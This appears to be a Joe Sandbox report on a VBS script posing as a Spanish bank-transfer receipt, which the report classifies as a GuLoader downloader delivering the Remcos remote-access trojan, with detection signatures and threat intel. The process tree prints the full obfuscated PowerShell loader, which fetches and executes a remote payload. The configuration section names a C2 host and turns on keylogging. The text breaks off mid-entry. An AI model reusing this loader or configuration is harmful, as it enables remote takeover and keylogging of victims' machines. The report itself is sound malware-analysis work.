Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Recibo de transferencia#U00b7pdf.vbs

Overview

General Information

Sample name:Recibo de transferencia#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:Recibo de transferenciapdf.vbs
Analysis ID:1523154
MD5:a510a741cf02891a5ae7268b7b92b9b8
SHA1:2740b1d3da34dab2396388ebb2c97763a3164ce5
SHA256:b1475086f2f81e2aca88d89cb0620f04e8d0b0a20b956821a0d2efe1b65ce060
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sample is not signed and drops a device driver
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7512 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7836 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7272 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7320 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000003.00000002.2330820054.0000000008EE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000008.00000002.2289212925.00000000057AA000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000003.00000002.2331073909.000000000B79A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000001.00000002.1880233584.000001F8A8C05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7592.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7836.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc9a2:$b2: ::FromBase64String(
              • 0xba05:$s1: -join
              • 0x51b1:$s4: +=
              • 0x5273:$s4: +=
              • 0x949a:$s4: +=
              • 0xb5b7:$s4: +=
              • 0xb8a1:$s4: +=
              • 0xb9e7:$s4: +=
              • 0x160b2:$s4: +=
              • 0x16132:$s4: +=
              • 0x161f8:$s4: +=
              • 0x16278:$s4: +=
              • 0x1644e:$s4: +=
              • 0x164d2:$s4: +=
              • 0xc23e:$e4: Get-WmiObject
              • 0xc42d:$e4: Get-Process
              • 0xc485:$e4: Start-Process
              • 0x16d69:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs", ProcessId: 7512, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7592, TargetFilename: C:\Users\user\AppData\Roaming\Margenindstilling.Sys
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs", ProcessId: 7512, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos 